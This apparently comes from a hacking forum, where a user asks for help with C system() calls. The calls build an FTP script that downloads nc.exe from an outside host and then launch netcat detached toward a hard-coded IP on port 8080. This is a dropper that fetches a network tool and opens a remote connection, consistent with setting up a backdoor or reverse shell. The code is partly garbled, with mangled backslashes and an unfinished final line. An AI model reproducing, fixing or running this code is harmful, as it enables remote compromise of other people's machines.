Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
C-system()
I have small problem… I need this to run:
system("@echo epp > c:&*92;ftptmp");
system("@echo live >> C:&*92;ftptmp");
system("@echo bin >> C:&*92;ftptmp");
system("@echo cd ftproot >> C:&*92;ftptmp");
system("@echo get nc.exe C:&*92;nc.exe >> C:&*92;ftptmp");
system("@echo bye >> C:&*92;ftptmp");
system("@if exists C:&*92;ftptmp ftp -s:C:&*92;ftptmp ic.cz");
system("@if exists C:&*92;nc.exe (C:&*92;nc -d 62.177.92.240 8080) else (");
system("ftp -s:C:&*92;ftptmp ic.cz");
(name and password are incorrect..)